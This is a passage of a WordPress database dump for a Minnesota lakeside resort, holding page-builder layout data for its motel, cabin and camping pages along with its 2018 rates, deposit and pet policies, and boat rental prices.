CABINS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"950d353\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8cb56ad\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"20cbc4b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"aaee620\"}]},\"elements\":[{\"id\":\"930f206\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"CAMPING\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1383,656,'_elementor_edit_mode','builder'),(1384,656,'_elementor_version','0.4'),(1385,656,'_elementor_data','[{\"id\":\"6be0c53a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bade079\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"41eeadc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Our <a href=\\\"http:\\/\\/ashbyresort.com\\/motel\\/\\\">Motel<\\/a>, <a href=\\\"http:\\/\\/ashbyresort.com\\/cabins\\/\\\">Cabins<\\/a> and <a href=\\\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\\\">New Cabins<\\/a> are lakeside on level grounds with a park like setting that is even more captivating during our beautiful sunsets. We also have <a href=\\\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\\\">Tent and RV camping sites<\\/a> available.<\\/p>[caption id=\\\"attachment_302\\\" align=\\\"alignnone\\\" width=\\\"300\\\"]<img class=\\\"wp-image-302 size-medium\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel-300x225.jpg\\\" width=\\\"300\\\" height=\\\"225\\\" \\/> MOTEL KITCHENETTES &amp; SLEEPERS[\\/caption][caption id=\\\"attachment_287\\\" align=\\\"alignnone\\\" width=\\\"300\\\"]<img class=\\\"wp-image-287 size-medium\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-008-300x225.jpg\\\" width=\\\"300\\\" height=\\\"225\\\" \\/> CABINS[\\/caption][caption id=\\\"attachment_354\\\" align=\\\"alignnone\\\" width=\\\"300\\\"]<img class=\\\"wp-image-354 size-medium\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3477-300x225.jpg\\\" width=\\\"300\\\" height=\\\"225\\\" \\/> NEWER CABINS[\\/caption][caption id=\\\"attachment_253\\\" align=\\\"alignnone\\\" width=\\\"300\\\"]<img class=\\\"wp-image-253 size-medium\\\" src=\\\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881-300x225.jpg\\\" width=\\\"300\\\" height=\\\"225\\\" \\/> CAMPING[\\/caption]\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9817a90\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e424741\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"466f112\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Our <a href=\\\"http:\\/\\/ashbyresort.com\\/motel\\/\\\">Motel<\\/a>, <a href=\\\"http:\\/\\/ashbyresort.com\\/cabins\\/\\\">Cabins<\\/a> and <a href=\\\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\\\">New Cabins<\\/a> are lakeside on level grounds with a park like setting that is even more captivating during our beautiful sunsets. We also have <a href=\\\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\\\">Tent and RV camping sites<\\/a> available.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e1f964\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"da0325a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"373f2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSC00168.jpg\",\"id\":112},\"caption\":\"MOTEL KITCHENETTES & SLEEPERS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/motel\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6894a84\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4107d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-008.jpg\",\"id\":287},\"caption\":\"CABINS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/cabins\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5fb2129\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4d11d8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3477.jpg\",\"id\":354},\"caption\":\"NEWER CABINS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"950d353\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"930f206\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"CAMPING\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1386,657,'_elementor_edit_mode','builder'),(1387,657,'_elementor_version','0.4'),(1388,657,'_elementor_data','[{\"id\":\"9817a90\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e424741\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"466f112\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Our <a href=\\\"http:\\/\\/ashbyresort.com\\/motel\\/\\\">Motel<\\/a>, <a href=\\\"http:\\/\\/ashbyresort.com\\/cabins\\/\\\">Cabins<\\/a> and <a href=\\\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\\\">New Cabins<\\/a> are lakeside on level grounds with a park like setting that is even more captivating during our beautiful sunsets. We also have <a href=\\\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\\\">Tent and RV camping sites<\\/a> available.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e1f964\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"da0325a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"373f2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSC00168.jpg\",\"id\":112},\"caption\":\"MOTEL KITCHENETTES & SLEEPERS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/motel\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6894a84\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4107d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-008.jpg\",\"id\":287},\"caption\":\"CABINS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/cabins\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5fb2129\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4d11d8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3477.jpg\",\"id\":354},\"caption\":\"NEWER CABINS\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/large-cabins\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"950d353\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"930f206\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"CAMPING\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/campgrounds\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1390,12,'vantage_panels_no_legacy','true'),(1391,12,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1392,659,'vantage_panels_no_legacy','true'),(1393,659,'notification_id','721'),(1394,659,'type','success'),(1395,659,'dismissable','1'),(1396,659,'location','[\"everywhere\"]'),(1397,659,'version',''),(1398,659,'viewed','1'),(1399,659,'expiration','1522796400'),(1400,659,'plans','[]'),(1454,670,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:2051:\"Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018	Bedrooms	Weekday Nightly	Weekend Holiday Nightly	Weekly Sept. – May	Weekly June – Aug.	Maximum Capacity	\nSleepers Motel	1	$80.00	$95.00	$450.00	$550.00	4	\nKitchenettes Motel	1	$100.00	$130.00	$600.00	$700.00	4	\nSuite 9	2	$175.00	$225.00	$900.00	$1,100.00	4	\nCabins (#10 #11 #12)	2	$180.00	$230.00	$900.00	$1,100.00	8	\nCabins (#13 #14)	2	$200.00	$250.00	$1,000.00	$1,200.00	8	\nTent & Popups	1 per site	$35.00	$35.00	$180.00	$180.00		\nRV/Travel Trailers	1  per site	$45.00	$45.00	$250.00	$250.00		\nPets		$5.00	$5.00	$35.00	$35.00		\nAdditional People Camping (Each)		$5.00	$5.00	$25.00	$25.00		\nAdditional People in Motel and Cabins (Each)		$20.00	$20.00	$100.00	$100.00		\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available	Daily	Weekly	\n14\' Lund Boat	$20.00	$100.00	\n15 H.P. 4 Stroke Yamaha Motor	$30.00	$150.00	Plus Gas\nBoat and Motor	$50.00	$250.00	Plus Gas\n			\n20\' Pontoon with 25 H.P. Motor	$125.00	$450.00	Plus Gas\nPaddle Boards	$5.00 per hour		\nBoat Lifts	$20.00	$100.00	\nBoat Launching/Docking			$5.00 One time Fee\n\n\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"e7939d22-b487-4b83-b0a7-c0e7f971e157\";s:5:\"style\";a:0:{}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1456,671,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:2051:\"Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018	Bedrooms	Weekday Nightly	Weekend Holiday Nightly	Weekly Sept. – May	Weekly June – Aug.	Maximum Capacity	\nSleepers Motel	1	$80.00	$95.00	$450.00	$550.00	4	\nKitchenettes Motel	1	$100.00	$130.00	$600.00	$700.00	4	\nSuite 9	2	$175.00	$225.00	$900.00	$1,100.00	4	\nCabins (#10 #11 #12)	2	$180.00	$230.00	$900.00	$1,100.00	8	\nCabins (#13 #14)	2	$200.00	$250.00	$1,000.00	$1,200.00	8	\nTent & Popups	1 per site	$35.00	$35.00	$180.00	$180.00		\nRV/Travel Trailers	1  per site	$45.00	$45.00	$250.00	$250.00		\nPets		$5.00	$5.00	$35.00	$35.00		\nAdditional People Camping (Each)		$5.00	$5.00	$25.00	$25.00		\nAdditional People in Motel and Cabins (Each)		$20.00	$20.00	$100.00	$100.00		\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available	Daily	Weekly	\n14\' Lund Boat	$20.00	$100.00	\n15 H.P. 4 Stroke Yamaha Motor	$30.00	$150.00	Plus Gas\nBoat and Motor	$50.00	$250.00	Plus Gas\n			\n20\' Pontoon with 25 H.P. Motor	$125.00	$450.00	Plus Gas\nPaddle Boards	$5.00 per hour		\nBoat Lifts	$20.00	$100.00	\nBoat Launching/Docking			$5.00 One time Fee\n\n\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"e7939d22-b487-4b83-b0a7-c0e7f971e157\";s:5:\"style\";a:0:{}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1498,679,'vantage_panels_no_legacy','true'),(1499,679,'_tablepress_table_options','{\"last_editor\":3,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":false,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":20,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),(1500,679,'_tablepress_table_visibility','{\"rows\":[1,1,1,1,1,1,1,1,1,1,1,1,1],\"columns\":[1,1,1,1,1,1,1]}'),(1501,681,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:2041:\"Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018\nBedrooms\nWeekday Nightly\nWeekend Holiday Nightly\nWeekly Sept. – May\nWeekly June – Aug.\nMaximum Capacity\n\nSleepers Motel\n1\n$80.00\n$95.00\n$450.00\n$550.00\n4\nKitchenettes Motel\n1\n$100.00\n$130.00\n$600.00\n$700.00\n4\nSuite 9\n2\n$175.00\n$225.00\n$900.00\n$1,100.00\n4\nCabins (#10 #11 #12)\n2\n$180.00\n$230.00\n$900.00\n$1,100.00\n8\nCabins (#13 #14)\n2\n$200.00\n$250.00\n$1,000.00\n$1,200.00\n8\nTent & Popups\n1 per site\n$35.00\n$35.00\n$180.00\n$180.00\n\nRV/Travel Trailers\n1  per site\n$45.00\n$45.00\n$250.00\n$250.00\n\n\nPets\n\n$5.00\n$5.00\n$35.00\n$35.00\n\n\nAdditional People Camping (Each)\n\n$5.00\n$5.00\n$25.00\n$25.00\n\n\nAdditional People in Motel and Cabins (Each)\n\n$20.00\n$20.00\n$100.00\n$100.00\n\n\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf Available\nDaily\nWeekly\n\n14\' Lund Boat\n$20.00\n$100.00\n\n15 H.P. 4 Stroke Yamaha Motor\n$30.00\n$150.00\nPlus Gas\nBoat and Motor\n$50.00\n$250.00\nPlus Gas\n\n20\' Pontoon with 25 H.P. Motor\n$125.00\n$450.00\nPlus Gas\nPaddle Boards\n$5.00 per hour\nBoat Lifts\n$20.00\n$100.00\n\nBoat Launching/Docking\n\n\n$5.00 One time Fee\n\";s:5:\"title\";s:0:\"\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"9cffffcd-ffaa-480f-8a5a-0fcdb0ad395c\";s:5:\"style\";a:0:{}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1502,43,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:392:\"Call us at 218-747-2959 for reservations \n<strong>NO checkins after 10:00 PM !!</strong>\n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  BALANCE IS DUE UPON ARRIVAL.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW.\nA 3% FEE WILL BE CHARGED FOR ALL CREDIT AND DEBIT CARD USAGE.\nALL GUESTS MUST CHECK IN AT THE RESORT OFFICE UPON ARRIVAL.\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1567111750426\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:897:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!</p>\n<p>Pets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!</p>\n<p>MOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1567111797665\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1503,682,'panels_data','a:3:{s:7:\"widgets\";a:1:{i:0;a:5:{s:6:\"filter\";s:1:\"1\";s:4:\"text\";s:2041:\"Call us at 218-747-2959 for reservations A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nWireless Internet Available\n2018 Rates\n2018\nBedrooms\nWeekday Nightly\nWeekend Holiday Nightly\nWeekly Sept. – May\nWeekly June – Aug.\nMaximum Capacity\n\nSleepers Motel\n1\n$80.00\n$95.00\n$450.00\n$550.00\n4\nKitchenettes Motel\n1\n$100.00\n$130.00\n$600.00\n$700.00\n4\nSuite 9\n2\n$175.00\n$225.00\n$900.00\n$1,100.00\n4\nCabins (#10 #11 #12)\n2\n$180.00\n$230.00\n$900.00\n$1,100.00\n8\nCabins (#13 #14)\n2\n$200.00\n$250.00\n$1,000.00\n$1,200.00\n8\nTent & Popups\n1 per site\n$35.00\n$35.00\n$180.00\n$180.00\n\nRV/Travel Trailers\n1  per site\n$45.00\n$45.00\n$250.00\n$250.00\n\n\nPets\n\n$5.00\n$5.00\n$35.00\n$35.00\n\n\nAdditional People Camping (Each)\n\n$5.00\n$5.00\n$25.00\n$25.00\n\n\nAdditional People in Motel and Cabins (Each)\n\n$20.00\n$20.00\n$100.00\n$100.00\n\n\nSuite #9 – Cabins #13 & #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS & HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\n \n\nEquipment Rentals\nIf 